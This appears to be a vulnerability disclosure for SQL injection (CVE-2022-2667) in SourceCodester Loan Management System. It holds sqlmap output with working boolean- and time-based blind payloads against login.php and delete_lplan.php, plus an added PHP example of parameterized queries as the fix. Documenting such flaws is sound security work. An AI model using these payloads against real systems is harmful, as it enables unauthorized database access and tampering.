CVE-2022-2667: GitHub - cxaqhq/Loan-Management-System-Sqlinjection

A vulnerability was found in SourceCodester Loan Management System and classified as critical. This issue affects some unknown processing of the file delete_lplan.php. The manipulation of the argument lplan_id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-205619.


Loan-Management-System-Sqlinjection

Sqlinjection 1

Sqlinjection Page

login.php

Sqlmap

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: username=1' OR NOT 8877=8877#&password=1&login=1

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=1' AND (SELECT 4254 FROM (SELECT(SLEEP(5)))Ydjq)-- NMhF&password=1&login=1
---
[21:25:18] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.39, PHP 5.6.9
back-end DBMS: MySQL >= 5.0.12

Code

The query does not bind its parameters with bind_param.
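
An added example, not code from the Loan Management System or from the original report: the bind_param binding the report says is missing, applied to the username lookup in login.php and to the lplan_id delete in delete_lplan.php. Table and column names, function names and connection values are assumptions; the code is written to run on PHP 5.6 with mysqlnd.

```php
<?php
// Added example. Table/column names (users, loan_plan, lplan_id) are assumptions;
// the page does not show the application's schema or source.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // fail loudly on SQL errors

// Unbound pattern of the kind reported (assumed shape): request data pasted into SQL text
//   $db->query("DELETE FROM loan_plan WHERE lplan_id = '" . $_GET['lplan_id'] . "'");

/** Look up a user by name; the value is sent as bound data, never as SQL text. */
function find_user(mysqli $db, $username)
{
    $stmt = $db->prepare('SELECT username, password FROM users WHERE username = ?');
    $stmt->bind_param('s', $username);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc(); // get_result() needs mysqlnd
    $stmt->close();
    return $row ?: null;
}

/** Accept lplan_id only if it is a positive integer; otherwise return null. */
function parse_plan_id($raw)
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, array('options' => array('min_range' => 1)));
    return $id === false ? null : $id;
}

/** Delete one loan plan; true only if exactly one row was removed. */
function delete_plan(mysqli $db, $rawId)
{
    $id = parse_plan_id($rawId);
    if ($id === null) {
        return false; // quotes, operators or subqueries in the value are rejected here
    }
    $stmt = $db->prepare('DELETE FROM loan_plan WHERE lplan_id = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $deleted = ($stmt->affected_rows === 1);
    $stmt->close();
    return $deleted;
}

// Usage (connection values are placeholders; password column assumed to hold password_hash() output):
// $db   = new mysqli('localhost', 'app_user', 'app_password', 'loan_db');
// $user = find_user($db, isset($_POST['username']) ? $_POST['username'] : '');
// $ok   = $user !== null && password_verify($_POST['password'], $user['password']);
// $gone = delete_plan($db, isset($_GET['lplan_id']) ? $_GET['lplan_id'] : null);
```

With the value bound, the boolean and time-based conditions in the sqlmap output are compared as literal strings or rejected by the integer check, so they no longer change the query's logic.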

Sqlinjection 2 (too many)

Sqlinjection Page

delete_lplan.php

Sqlmap

GET parameter 'lplan_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

sqlmap identified the following injection point(s) with a total of 1899 HTTP(s) requests:
---
Parameter: lplan_id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: lplan_id=2'+(SELECT 0x714c6c4c WHERE 6948=6948 AND (SELECT 7588 FROM (SELECT(SLEEP(5)))BFGS))+'
---
[21:51:10] [INFO] the back-end DBMS is MySQL
[21:51:10] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[21:51:10] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
web application technology: PHP 5.6.9, Apache 2.4.39
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)

Code

A lot of

Code Download

https://www.sourcecodester.com/php/15529/loan-management-system-oop-php-mysqlijquery-free-source-code.html
